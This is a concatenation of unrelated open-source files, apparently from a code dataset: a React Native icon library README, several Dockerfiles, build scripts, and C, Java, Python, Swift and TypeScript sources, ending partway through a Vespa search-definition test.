Returns your own custom font based on the `glyphMap` where the key is the icon name and the value is either a UTF-8 character or it's character code. `fontFamily` is the name of the font **NOT** the filename. Open the font in Font Book.app or similar to learn the name. Optionally pass the third `fontFile` argument for android support, it should be the custom font file name.
```js
import { createIconSet } from 'react-native-vector-icons';
const glyphMap = { 'icon-name': 1234, test: '∆' };
const Icon = createIconSet(glyphMap, 'FontName', 'font-name.ttf');
```
### `createIconSetFromFontello(config[, fontFamily[, fontFile]])`
Convenience method to create a custom font based on a [fontello](http://fontello.com) config file. Don't forget to import the font as described above and drop the `config.json` somewhere convenient in your project.
```js
import { createIconSetFromFontello } from 'react-native-vector-icons';
import fontelloConfig from './config.json';
const Icon = createIconSetFromFontello(fontelloConfig);
```
### `createIconSetFromIcoMoon(config[, fontFamily[, fontFile]])`
```js
import { createIconSetFromIcoMoon } from 'react-native-vector-icons';
import icoMoonConfig from './selection.json';
const Icon = createIconSetFromIcoMoon(
icoMoonConfig,
'LineAwesome',
'line-awesome.ttf'
);
```
Make sure you're using the _Download_ option in [IcoMoon](https://icomoon.io/app), and use the `.json` file that's included in the `.zip` you've downloaded. You'll also need to import the `.ttf` font file into your project, following the instructions above.
### `createMultiStyleIconSet(styles [, options])`
```jsx
import { createMultiStyleIconSet } from 'react-native-vector-icons';
/*
* This is just example code, you are free to
* design your glyphmap and styles to your liking
*/
import glyphmap from './glyphmap.json';
/*
* glyphmap = {
* "style1": [
* "hello",
* "world"
* ],
* "style2": [
* "foo",
* "bar"
* ]
* }
*/
const glyphKeys = Object.keys(glyphmap); /* ["style1", "style2"] */
const options = {
defaultStyle: 'style1',
glyphValidator: (name, style) => glyphKeys.indexOf(name) !== -1,
fallbackFamily: (name) => {
for (let i = 0; i < glyphKeys.length; i++) {
const style = glyphKeys[i];
if (glyphmap[style].indexOf(name) !== -1) {
return style;
}
}
/* Always return some family */
return glyphKeys[0];
}
};
/*
* The styles object consits of keys, which will be
* used as the styles later, and objects which are
* used as style objects for the font. The style
* should have unique characteristics for each font
* in order to ensure that the right one will be
* chosen. FontAwesome 5 uses font weight since
* 5.7.0 in order to diffirentiate the styles but
* other properties (like fontFamily) can be used.
* It's just a standard RN style object.
*/
const styles = {
style1: {
fontWeight: '700'
},
style2: {
fontWeight: '100'
}
};
const Icon = createMultiStyleIconSet(styles, options);
/* Uses default style (style1) */
<Icon name={'hello'} />
<Icon name={'world'} style1 />
/* Default style is style1 but this will fall back to style2 */
<Icon name={'foo'} />
/* This will also fall back to style2 */
<Icon name={'foo'} style1 />
/* Regular use of style2 */
<Icon name={'bar'} style2 />
```
| option | Description | default |
| -------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | ---------------------------------- |
| defaultStyle | The name of the style to be used if no style is supplied during rendering. | `Object.keys(styles)[0]` |
| fallbackFamily | Function for selecting a family if a glyph is not available. The function should accept the `name` of the glyph as a parameter. Returns the name if the family. | `(name) => Object.keys(styles)[0]` |
| glyphValidator | Function for validating that a glyph is available for a chosen style. It has `name` and `style` as parameters, in that order. Returns `true` if the glyph is valid or `false` if it's not. | `(name, style) => true` |
#### iOS
You have to manually make a reference of your `.ttf` on your xcodeproj `Resources` folder and in `Info.plist`.
## Animation
React Native comes with an amazing animation library called [`Animated`](https://reactnative.dev/docs/animated.html). To use it with an icon, simply create an animated component with this line: `const AnimatedIcon = Animated.createAnimatedComponent(Icon)`. You can also use the higher level animation library [react-native-animatable](https://github.com/oblador/react-native-animatable).
## Examples
### IconExplorer
Try the `IconExplorer` project in `Examples/IconExplorer` folder, there you can also search for any icon.

### Basic Example
```js
import Icon from 'react-native-vector-icons/Ionicons';
function ExampleView(props) {
return <Icon name="ios-person" size={30} color="#4F8EF7" />;
}
```
### TabBarIOS
Full example in `TabBarExample` project in `Examples/TabBarExample` folder.
```js
import { View, Text, TabBarIOS } from 'react-native';
import Icon from 'react-native-vector-icons/Ionicons';
function TabBarView(props) {
return (
<TabBarIOS>
<Icon.TabBarItem
title="Home"
iconName="ios-home-outline"
selectedIconName="ios-home"
>
<View style={styles.tabContent}>
<Text>Home Tab</Text>
</View>
</Icon.TabBarItem>
</TabBarIOS>
);
}
```
### ToolbarAndroid
Since [`ToolbarAndroid`](https://github.com/react-native-community/toolbar-android) was removed from core, it is also removed as a convenience component from this library. Simply use `getImageSourceSync` instead, but don't forget to import and link to this project as described above first.
```js
import ToolbarAndroid from '@react-native-community/toolbar-android';
import Icon from 'react-native-vector-icons/Ionicons';
const navIcon = Icon.getImageSourceSync('md-arrow-back', 24, 'white');
const overflowIcon = Icon.getImageSourceSync('md-more', 24, 'white');
const settingsIcon = Icon.getImageSourceSync('md-settings', 30, 'white');
const twitterIcon = Icon.getImageSourceSync('logo-twitter', 25, '#4099FF');
function ToolbarView(props) {
return (
<ToolbarAndroid
title="Home"
titleColor="white"
navIcon={navIcon}
onIconClicked={props.navigator.pop}
actions={[
{
title: 'Settings',
icon: settingsIcon,
show: 'always',
},
{
title: 'Follow me on Twitter',
icon: twitterIcon,
show: 'ifRoom',
},
]}
overflowIcon={overflowIcon}
/>
);
}
```
### Inline Icons
```js
import { Text } from 'react-native';
import Icon from 'react-native-vector-icons/Ionicons';
function ExampleView(props) {
return (
<Text>
Lorem <Icon name="ios-book" color="#4F8EF7" /> Ipsum
</Text>
);
}
```
### Community examples
- [react-native-dribbble-app](https://github.com/catalinmiron/react-native-dribbble-app)
- [product-kitty](https://github.com/rkho/product-kitty) ([blog post](http://richardkho.com/persisting-tabbars-in-react-native/))
- [react-native-netflix](https://github.com/mariodev12/react-native-netflix)
## Generating your own icon set from a CSS file
If you already have a icon font with associated CSS file then you can easily generate a icon set with the `generate-icon` script.
### Example usage:
```
./node_modules/.bin/generate-icon path/to/styles.css --componentName=MyIcon --fontFamily=myicon > Components/MyIcon.js
```
### Options
Any flags not listed below, like `--componentName` and `--fontFamily`, will be passed on to the template.
#### `-p`, `--prefix`
CSS selector prefix [default: ".icon-"]
#### `-t`, `--template`
Template in lodash format [default: "./template/iconSet.tpl"]
For default template please provide `--componentName` and `--fontFamily`.
#### `-o`, `--output`
Save output to file, defaults to STDOUT
## [Changelog](https://github.com/oblador/react-native-vector-icons/releases)
## Troubleshooting
#### The icons show up as a crossed out box on Android
- Make sure you've copied the font to `android/app/src/main/assets/fonts`.
- Delete the build folder with `rm -rf android/app/build`.
- Recompile the project.
#### Red screen with "Unrecognized font family" error on iOS
- Make sure you've added manually the reference of your `.ttf` on your xcodeproj `Resources` folder.
- Check that the font you are trying to use appears in `Info.plist`, if you've added the whole folder and it's blue in color, then you need to add it to the path.
- Check that the font is copied in the _Copy Bundle Resources_ in _Build Phases_.
- Delete the build folder with `rm -rf ios/build`
- Recompile the project.
#### Android build fails on Windows for no good reason
Both npm and android file hierarchies tend to get very deep and even worse when you combine them. Since Windows file system has a max length, long file name addresses will result in numerous errors including `Execution failed for task ':react-native-vector-icons:processReleaseResources'`. So try to keep the path to your project folder as short as possible.
#### Wrong icons are shown after upgrading this package
You probably didn't update the font files linked to your native project after upgrading. However, this only applies to Android targets since iOS bundles the fonts when building the app (try to clean your build from Xcode if the problem exists). On android you can relink the project or you manually update the fonts. To have them automatically synced use the [gradle approach](https://github.com/oblador/react-native-vector-icons#option-with-gradle-recommended).
#### Some icons are missing after upgrading this package
Sometimes vendors decides to remove some icons from newer releases, this has nothing to do with this package. If you depend on an older version of a font you can add it as a [custom font](#custom-fonts).
## License
This project is licenced under the [MIT License](http://opensource.org/licenses/mit-license.html).
Any bundled fonts are copyright to their respective authors and mostly under MIT or [SIL OFL](http://scripts.sil.org/OFL).
| {
"pile_set_name": "Github"
} |
# ------------------------------------------------------------------------------
# NOTE: THIS DOCKERFILE IS GENERATED VIA "build_latest.sh" or "update_multiarch.sh"
#
# PLEASE DO NOT EDIT IT DIRECTLY.
# ------------------------------------------------------------------------------
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
FROM mcr.microsoft.com/windows/servercore:1909
# $ProgressPreference: https://github.com/PowerShell/PowerShell/issues/2138#issuecomment-251261324
SHELL ["powershell", "-Command", "$ErrorActionPreference = 'Stop'; $ProgressPreference = 'SilentlyContinue';"]
ENV JAVA_VERSION jdk8u
RUN Write-Host ('Downloading https://github.com/AdoptOpenJDK/openjdk8-binaries/releases/download/jdk8u-2020-09-26-11-07/OpenJDK8U-jre_x64_windows_openj9_2020-09-26-11-07.msi ...'); \
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; \
wget https://github.com/AdoptOpenJDK/openjdk8-binaries/releases/download/jdk8u-2020-09-26-11-07/OpenJDK8U-jre_x64_windows_openj9_2020-09-26-11-07.msi -O 'openjdk.msi'; \
Write-Host ('Verifying sha256 (6da5207d7a068baf849bd7af591a915425bf5010e63652f9be45bdea3158a81f) ...'); \
if ((Get-FileHash openjdk.msi -Algorithm sha256).Hash -ne '6da5207d7a068baf849bd7af591a915425bf5010e63652f9be45bdea3158a81f') { \
Write-Host 'FAILED!'; \
exit 1; \
}; \
\
New-Item -ItemType Directory -Path C:\temp | Out-Null; \
\
Write-Host 'Installing using MSI ...'; \
Start-Process -FilePath "msiexec.exe" -ArgumentList '/i', 'openjdk.msi', '/L*V', 'C:\temp\OpenJDK.log', \
'/quiet', 'ADDLOCAL=FeatureEnvironment,FeatureJarFileRunWith,FeatureJavaHome' -Wait -Passthru; \
Remove-Item -Path C:\temp -Recurse | Out-Null; \
Write-Host 'Removing openjdk.msi ...'; \
Remove-Item openjdk.msi -Force
ENV JAVA_TOOL_OPTIONS="-XX:+IgnoreUnrecognizedVMOptions -XX:+UseContainerSupport -XX:+IdleTuningCompactOnIdle -XX:+IdleTuningGcOnIdle"
| {
"pile_set_name": "Github"
} |
fileFormatVersion: 2
guid: 973c73f34132a1a4bbad8414c56117de
folderAsset: yes
timeCreated: 1435661090
licenseType: Store
DefaultImporter:
userData:
assetBundleName:
assetBundleVariant:
| {
"pile_set_name": "Github"
} |
/* Public key algorithm internals
*
* See Documentation/crypto/asymmetric-keys.txt
*
* Copyright (C) 2012 Red Hat, Inc. All Rights Reserved.
* Written by David Howells ([email protected])
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public Licence
* as published by the Free Software Foundation; either version
* 2 of the Licence, or (at your option) any later version.
*/
#include <crypto/public_key.h>
extern struct asymmetric_key_subtype public_key_subtype;
/*
* Public key algorithm definition.
*/
struct public_key_algorithm {
const char *name;
u8 n_pub_mpi; /* Number of MPIs in public key */
u8 n_sec_mpi; /* Number of MPIs in secret key */
u8 n_sig_mpi; /* Number of MPIs in a signature */
int (*verify_signature)(const struct public_key *key,
const struct public_key_signature *sig);
};
extern const struct public_key_algorithm RSA_public_key_algorithm;
| {
"pile_set_name": "Github"
} |
ARG ARCH
FROM ${ARCH}ubuntu:bionic
WORKDIR /workdir
RUN sed -i s,http://archive.ubuntu.com/ubuntu/,mirror://mirrors.ubuntu.com/mirrors.txt, /etc/apt/sources.list \
&& apt-get update \
&& apt-get -qyy --no-install-recommends install git gcc-4.8 gcc-5 gcc-6 gcc-7 gcc-8 clang-3.9 clang-4.0 clang-5.0 clang-6.0 clang-7 gcc-mingw-w64-x86-64 gcc-mingw-w64-i686 make ca-certificates autoconf automake libtool pkg-config libhdf5-dev \
&& apt-get clean && rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/* /workdir/*
RUN apt-get update \
&& apt-get -qyy --install-recommends install gcc-arm-linux-gnueabi \
&& apt-get clean && rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/* /workdir/*
| {
"pile_set_name": "Github"
} |
/* BEGIN_COMMON_COPYRIGHT_HEADER
* (c)LGPL2+
*
* LXQt - a lightweight, Qt based, desktop toolset
* https://lxqt.org
*
* Copyright: 2013 Razor team
* Authors:
* Alexander Sokoloff <[email protected]>
*
* This program or library is free software; you can redistribute it
* and/or modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
* You should have received a copy of the GNU Lesser General
* Public License along with this library; if not, write to the
* Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
* Boston, MA 02110-1301 USA
*
* END_COMMON_COPYRIGHT_HEADER */
#ifndef LXQT_PLUGIN_MOUNT_DEVICEACTION_INFO_H
#define LXQT_PLUGIN_MOUNT_DEVICEACTION_INFO_H
#include "deviceaction.h"
#include <QWidget>
#include <QTimer>
class Popup;
class DeviceActionInfo : public DeviceAction
{
Q_OBJECT
public:
explicit DeviceActionInfo(LXQtMountPlugin *plugin, QObject *parent = nullptr);
virtual ActionId Type() const throw () { return ActionInfo; }
protected:
void doDeviceAdded(Solid::Device device);
void doDeviceRemoved(Solid::Device device);
private:
void showMessage(const QString &text);
};
#endif // DEVICEACTION_INFO_H
| {
"pile_set_name": "Github"
} |
try {
Object.assign(global, require('../build.config'));
// tslint:disable-next-line
const modules = require('./modules').default;
(async () => {
await modules.createApp(module);
})();
} catch (e) {
if (typeof ErrorUtils !== 'undefined') {
(ErrorUtils as any).reportFatalError(e);
} else {
console.error(e);
}
}
| {
"pile_set_name": "Github"
} |
ks.type = "sparql"
ks.url = "http://live.dbpedia.org/sparql"
ks.defaultGraphURIs = {"http://dbpedia.org"}
alg.type = "objectproperty range learner"
alg.source = component:ks
alg.propertyToDescribe = "http://dbpedia.org/ontology/leader"
| {
"pile_set_name": "Github"
} |
/* Soot - a Java Optimization Framework
* Copyright (C) 2012 Michael Markert, Frank Hartmann
*
* (c) 2012 University of Luxembourg - Interdisciplinary Centre for
* Security Reliability and Trust (SnT) - All rights reserved
* Alexandre Bartel
*
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the
* Free Software Foundation, Inc., 59 Temple Place - Suite 330,
* Boston, MA 02111-1307, USA.
*/
package soot.dexpler.instructions;
import org.jf.dexlib2.iface.instruction.Instruction;
import org.jf.dexlib2.iface.instruction.formats.Instruction11x;
import soot.Local;
import soot.dexpler.Debug;
import soot.dexpler.DexBody;
import soot.dexpler.IDalvikTyper;
import soot.dexpler.typing.DalvikTyper;
import soot.jimple.Jimple;
import soot.jimple.ReturnStmt;
public class ReturnInstruction extends DexlibAbstractInstruction {
ReturnStmt returnStmt = null;
public ReturnInstruction (Instruction instruction, int codeAdress) {
super(instruction, codeAdress);
}
public void jimplify (DexBody body) {
Instruction11x returnInstruction = (Instruction11x) this.instruction;
Local l = body.getRegisterLocal(returnInstruction.getRegisterA());
returnStmt = Jimple.v().newReturnStmt(l);
setUnit(returnStmt);
addTags(returnStmt);
body.add(returnStmt);
if (IDalvikTyper.ENABLE_DVKTYPER) {
Debug.printDbg(IDalvikTyper.DEBUG, "constraint: "+ returnStmt);
DalvikTyper.v().setType(returnStmt.getOpBox(), body.getBody().getMethod().getReturnType(), true);
}
}
}
| {
"pile_set_name": "Github"
} |
from conans.errors import ConanException
from conans.util.config_parser import ConfigParser
class ConanFileTextLoader(object):
"""Parse a conanfile.txt file"""
def __init__(self, input_text):
# Prefer composition over inheritance, the __getattr__ was breaking things
self._config_parser = ConfigParser(input_text, ["requires", "generators", "options",
"imports", "build_requires"],
parse_lines=True)
@property
def requirements(self):
"""returns a list of requires
EX: "OpenCV/2.4.10@phil/stable"
"""
return [r.strip() for r in self._config_parser.requires.splitlines()]
@property
def build_requirements(self):
"""returns a list of build_requires
EX: "OpenCV/2.4.10@phil/stable"
"""
return [r.strip() for r in self._config_parser.build_requires.splitlines()]
@property
def options(self):
return self._config_parser.options
@property
def _import_parameters(self):
def _parse_args(param_string):
root_package, ignore_case, folder, excludes, keep_path = None, False, False, None, True
params = param_string.split(",")
params = [p.strip() for p in params if p.strip()]
for param in params:
try:
var, value = param.split("=")
except ValueError:
raise ConanException("Wrong imports argument '%s'. "
"Need a 'arg=value' pair." % param)
var = var.strip()
value = value.strip()
if var == "root_package":
root_package = value
elif var == "ignore_case":
ignore_case = (value.lower() == "true")
elif var == "folder":
folder = (value.lower() == "true")
elif var == "excludes":
excludes = value.split()
elif var == "keep_path":
keep_path = (value.lower() == "true")
else:
raise Exception("Invalid imports. Unknown argument %s" % var)
return root_package, ignore_case, folder, excludes, keep_path
def _parse_import(line):
try:
pair = line.split("->", 1)
source = pair[0].strip().split(',', 1)
dest = pair[1].strip()
src, pattern = source[0].strip(), source[1].strip()
return pattern, dest, src
except Exception:
raise ConanException("Wrong imports line: %s\n"
"Use syntax: path, pattern -> local-folder" % line)
ret = []
local_install_text = self._config_parser.imports
for line in local_install_text.splitlines():
# discard blanks, comments, and discard trailing comments
line = line.strip()
if not line or line.startswith("#"):
continue
line = line.split("#", 1)[0]
invalid_line_msg = "Invalid imports line: %s\nEX: OpenCV/lib, * -> ./lib" % line
if line.startswith("/") or line.startswith(".."):
raise ConanException("%s\n%s" % (invalid_line_msg,
"Import's paths can't begin with '/' or '..'"))
try:
tokens = line.rsplit("@", 1)
if len(tokens) > 1:
line = tokens[0]
params = tokens[1]
else:
params = ""
root_package, ignore_case, folder, excludes, keep_path = _parse_args(params)
pattern, dest, src = _parse_import(line)
ret.append((pattern, dest, src, root_package, folder, ignore_case, excludes,
keep_path))
except Exception as e:
raise ConanException("%s\n%s" % (invalid_line_msg, str(e)))
return ret
@property
def generators(self):
return self._config_parser.generators.splitlines()
def imports_method(self, conan_file):
parameters = self._import_parameters
def imports():
for import_params in parameters:
conan_file.copy(*import_params)
return imports
| {
"pile_set_name": "Github"
} |
//
// HomeRowReminderTests.swift
// DuckDuckGo
//
// Copyright © 2018 DuckDuckGo. All rights reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
import XCTest
@testable import Core
@testable import DuckDuckGo
class HomeRowReminderTests: XCTestCase {
var storage: MockHomeRowReminderStorage!
override func setUp() {
storage = MockHomeRowReminderStorage()
}
func testWhenFeatureFirstAccessedThenDateIsStored() {
let feature = HomeRowReminder(storage: storage)
_ = feature.showNow(isDefaultBrowserSupported: false)
XCTAssertNotNil(storage.firstAccessDate)
}
func testWhenTimeHasElapseAndAlreadyShownThenDontShow() {
setReminderTimeElapsed()
let feature = HomeRowReminder(storage: storage)
feature.setShown()
XCTAssertFalse(feature.showNow(isDefaultBrowserSupported: false))
}
func testWhenIsNewAndTimeHasElapsedThenShow() {
setReminderTimeElapsed()
let feature = HomeRowReminder(storage: storage)
XCTAssertTrue(feature.showNow(isDefaultBrowserSupported: false))
}
func testWhenIsNewAndTimeNotElapsedThenDontShow() {
let feature = HomeRowReminder(storage: storage)
XCTAssertFalse(feature.showNow(isDefaultBrowserSupported: false))
}
private func setReminderTimeElapsed() {
let threeAndABitDaysAgo = -(60 * 60 * 24 * HomeRowReminder.Constants.reminderTimeInDays * 1.1)
storage.firstAccessDate = Date(timeIntervalSinceNow: threeAndABitDaysAgo)
}
}
class MockHomeRowReminderStorage: HomeRowReminderStorage {
var firstAccessDate: Date?
var shown: Bool = false
}
| {
"pile_set_name": "Github"
} |
@REM ----------------------------------------------------------------------------
@REM Licensed to the Apache Software Foundation (ASF) under one
@REM or more contributor license agreements. See the NOTICE file
@REM distributed with this work for additional information
@REM regarding copyright ownership. The ASF licenses this file
@REM to you under the Apache License, Version 2.0 (the
@REM "License"); you may not use this file except in compliance
@REM with the License. You may obtain a copy of the License at
@REM
@REM https://www.apache.org/licenses/LICENSE-2.0
@REM
@REM Unless required by applicable law or agreed to in writing,
@REM software distributed under the License is distributed on an
@REM "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
@REM KIND, either express or implied. See the License for the
@REM specific language governing permissions and limitations
@REM under the License.
@REM ----------------------------------------------------------------------------
@REM ----------------------------------------------------------------------------
@REM Maven2 Start Up Batch script
@REM
@REM Required ENV vars:
@REM JAVA_HOME - location of a JDK home dir
@REM
@REM Optional ENV vars
@REM M2_HOME - location of maven2's installed home dir
@REM MAVEN_BATCH_ECHO - set to 'on' to enable the echoing of the batch commands
@REM MAVEN_BATCH_PAUSE - set to 'on' to wait for a key stroke before ending
@REM MAVEN_OPTS - parameters passed to the Java VM when running Maven
@REM e.g. to debug Maven itself, use
@REM set MAVEN_OPTS=-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000
@REM MAVEN_SKIP_RC - flag to disable loading of mavenrc files
@REM ----------------------------------------------------------------------------
@REM Begin all REM lines with '@' in case MAVEN_BATCH_ECHO is 'on'
@echo off
@REM set title of command window
title %0
@REM enable echoing my setting MAVEN_BATCH_ECHO to 'on'
@if "%MAVEN_BATCH_ECHO%" == "on" echo %MAVEN_BATCH_ECHO%
@REM set %HOME% to equivalent of $HOME
if "%HOME%" == "" (set "HOME=%HOMEDRIVE%%HOMEPATH%")
@REM Execute a user defined script before this one
if not "%MAVEN_SKIP_RC%" == "" goto skipRcPre
@REM check for pre script, once with legacy .bat ending and once with .cmd ending
if exist "%HOME%\mavenrc_pre.bat" call "%HOME%\mavenrc_pre.bat"
if exist "%HOME%\mavenrc_pre.cmd" call "%HOME%\mavenrc_pre.cmd"
:skipRcPre
@setlocal
set ERROR_CODE=0
@REM To isolate internal variables from possible post scripts, we use another setlocal
@setlocal
@REM ==== START VALIDATION ====
if not "%JAVA_HOME%" == "" goto OkJHome
echo.
echo Error: JAVA_HOME not found in your environment. >&2
echo Please set the JAVA_HOME variable in your environment to match the >&2
echo location of your Java installation. >&2
echo.
goto error
:OkJHome
if exist "%JAVA_HOME%\bin\java.exe" goto init
echo.
echo Error: JAVA_HOME is set to an invalid directory. >&2
echo JAVA_HOME = "%JAVA_HOME%" >&2
echo Please set the JAVA_HOME variable in your environment to match the >&2
echo location of your Java installation. >&2
echo.
goto error
@REM ==== END VALIDATION ====
:init
@REM Find the project base dir, i.e. the directory that contains the folder ".mvn".
@REM Fallback to current working directory if not found.
set MAVEN_PROJECTBASEDIR=%MAVEN_BASEDIR%
IF NOT "%MAVEN_PROJECTBASEDIR%"=="" goto endDetectBaseDir
set EXEC_DIR=%CD%
set WDIR=%EXEC_DIR%
:findBaseDir
IF EXIST "%WDIR%"\.mvn goto baseDirFound
cd ..
IF "%WDIR%"=="%CD%" goto baseDirNotFound
set WDIR=%CD%
goto findBaseDir
:baseDirFound
set MAVEN_PROJECTBASEDIR=%WDIR%
cd "%EXEC_DIR%"
goto endDetectBaseDir
:baseDirNotFound
set MAVEN_PROJECTBASEDIR=%EXEC_DIR%
cd "%EXEC_DIR%"
:endDetectBaseDir
IF NOT EXIST "%MAVEN_PROJECTBASEDIR%\.mvn\jvm.config" goto endReadAdditionalConfig
@setlocal EnableExtensions EnableDelayedExpansion
for /F "usebackq delims=" %%a in ("%MAVEN_PROJECTBASEDIR%\.mvn\jvm.config") do set JVM_CONFIG_MAVEN_PROPS=!JVM_CONFIG_MAVEN_PROPS! %%a
@endlocal & set JVM_CONFIG_MAVEN_PROPS=%JVM_CONFIG_MAVEN_PROPS%
:endReadAdditionalConfig
SET MAVEN_JAVA_EXE="%JAVA_HOME%\bin\java.exe"
set WRAPPER_JAR="%MAVEN_PROJECTBASEDIR%\.mvn\wrapper\maven-wrapper.jar"
set WRAPPER_LAUNCHER=org.apache.maven.wrapper.MavenWrapperMain
set DOWNLOAD_URL="https://repo.maven.apache.org/maven2/io/takari/maven-wrapper/0.4.2/maven-wrapper-0.4.2.jar"
FOR /F "tokens=1,2 delims==" %%A IN (%MAVEN_PROJECTBASEDIR%\.mvn\wrapper\maven-wrapper.properties) DO (
IF "%%A"=="wrapperUrl" SET DOWNLOAD_URL=%%B
)
@REM Extension to allow automatically downloading the maven-wrapper.jar from Maven-central
@REM This allows using the maven wrapper in projects that prohibit checking in binary data.
if exist %WRAPPER_JAR% (
echo Found %WRAPPER_JAR%
) else (
echo Couldn't find %WRAPPER_JAR%, downloading it ...
echo Downloading from: %DOWNLOAD_URL%
powershell -Command "(New-Object Net.WebClient).DownloadFile('%DOWNLOAD_URL%', '%WRAPPER_JAR%')"
echo Finished downloading %WRAPPER_JAR%
)
@REM End of extension
%MAVEN_JAVA_EXE% %JVM_CONFIG_MAVEN_PROPS% %MAVEN_OPTS% %MAVEN_DEBUG_OPTS% -classpath %WRAPPER_JAR% "-Dmaven.multiModuleProjectDirectory=%MAVEN_PROJECTBASEDIR%" %WRAPPER_LAUNCHER% %MAVEN_CONFIG% %*
if ERRORLEVEL 1 goto error
goto end
:error
set ERROR_CODE=1
:end
@endlocal & set ERROR_CODE=%ERROR_CODE%
if not "%MAVEN_SKIP_RC%" == "" goto skipRcPost
@REM check for post script, once with legacy .bat ending and once with .cmd ending
if exist "%HOME%\mavenrc_post.bat" call "%HOME%\mavenrc_post.bat"
if exist "%HOME%\mavenrc_post.cmd" call "%HOME%\mavenrc_post.cmd"
:skipRcPost
@REM pause the script if MAVEN_BATCH_PAUSE is set to 'on'
if "%MAVEN_BATCH_PAUSE%" == "on" pause
if "%MAVEN_TERMINATE_CMD%" == "on" exit %ERROR_CODE%
exit /B %ERROR_CODE%
| {
"pile_set_name": "Github"
} |
package com.earth2me.essentials.storage;
import net.ess3.api.IEssentials;
import org.bukkit.Bukkit;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.PrintWriter;
import java.util.logging.Level;
public abstract class AbstractDelayedYamlFileWriter implements Runnable {
private final transient File file;
public AbstractDelayedYamlFileWriter(IEssentials ess, File file) {
this.file = file;
ess.runTaskAsynchronously(this);
}
public abstract StorageObject getObject();
@Override
public void run() {
PrintWriter pw = null;
try {
final StorageObject object = getObject();
final File folder = file.getParentFile();
if (!folder.exists()) {
folder.mkdirs();
}
pw = new PrintWriter(file);
new YamlStorageWriter(pw).save(object);
} catch (FileNotFoundException ex) {
Bukkit.getLogger().log(Level.SEVERE, file.toString(), ex);
} finally {
onFinish();
if (pw != null) {
pw.close();
}
}
}
public abstract void onFinish();
}
| {
"pile_set_name": "Github"
} |
export * from "./cosmos-hub-mainnet.js"
| {
"pile_set_name": "Github"
} |
# Define working variables
$octopusURL = "https://youroctourl"
$octopusAPIKey = "API-YOURAPIKEY"
$header = @{ "X-Octopus-ApiKey" = $octopusAPIKey }
$projectName = "MyProject"
$librarySetName = "MyLibrarySet"
try
{
# Get space
$space = (Invoke-RestMethod -Method Get -Uri "$octopusURL/api/spaces/all" -Headers $header) | Where-Object {$_.Name -eq $spaceName}
# Get project
$project = (Invoke-RestMethod -Method Get -Uri "$octopusURL/api/$($space.Id)/projects/all" -Headers $header) | Where-Object {$_.Name -eq $projectName}
# Get library set
$librarySet = (Invoke-RestMethod -Method Get -Uri "$octopusURL/api/$($space.Id)/libraryvariablesets/all" -Headers $header) | Where-Object {$_.Name -eq $librarySetName}
# Add the libarary set
$project.IncludedLibraryVariableSetIds += $librarySet.Id
# Update the project
Invoke-RestMethod -Method Put -Uri "$octopusURL/api/$($space.Id)/projects/$($project.Id)" -Headers $header -Body ($project | ConvertTo-Json -Depth 10)
}
catch
{
Write-Host $_.Exception.Message
} | {
"pile_set_name": "Github"
} |
// Copyright 2017 Yahoo Holdings. Licensed under the terms of the Apache 2.0 license. See LICENSE in the project root.
package com.yahoo.searchdefinition.processing;
import com.yahoo.document.DataType;
import com.yahoo.document.Field;
import com.yahoo.document.ReferenceDataType;
import com.yahoo.searchdefinition.DocumentGraphValidator;
import com.yahoo.searchdefinition.Search;
import com.yahoo.searchdefinition.SearchBuilder;
import com.yahoo.searchdefinition.document.SDDocumentType;
import com.yahoo.searchdefinition.parser.ParseException;
import org.junit.Rule;
import org.junit.Test;
import org.junit.rules.ExpectedException;
import static org.hamcrest.Matchers.instanceOf;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertNotNull;
import static org.junit.Assert.assertThat;
/**
* @author bjorncs
*/
public class ReferenceFieldTestCase {
@Rule
public final ExpectedException exceptionRule = ExpectedException.none();
@Test
public void reference_fields_are_parsed_from_search_definition() throws ParseException {
SearchBuilder builder = new SearchBuilder();
String campaignSdContent =
"search campaign {\n" +
" document campaign {\n" +
" }\n" +
"}";
String salespersonSdContent =
"search salesperson {\n" +
" document salesperson {\n" +
" }\n" +
"}";
String adSdContent =
"search ad {\n" +
" document ad {\n" +
" field campaign_ref type reference<campaign> { indexing: attribute }\n" +
" field salesperson_ref type reference<salesperson> { indexing: attribute }\n" +
" }\n" +
"}";
builder.importString(campaignSdContent);
builder.importString(salespersonSdContent);
builder.importString(adSdContent);
builder.build();
Search search = builder.getSearch("ad");
assertSearchContainsReferenceField("campaign_ref", "campaign", search.getDocument());
assertSearchContainsReferenceField("salesperson_ref", "salesperson", search.getDocument());
}
@Test
